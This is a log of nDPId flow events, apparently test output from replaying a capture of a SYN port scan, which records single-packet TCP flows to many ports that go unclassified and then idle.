-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
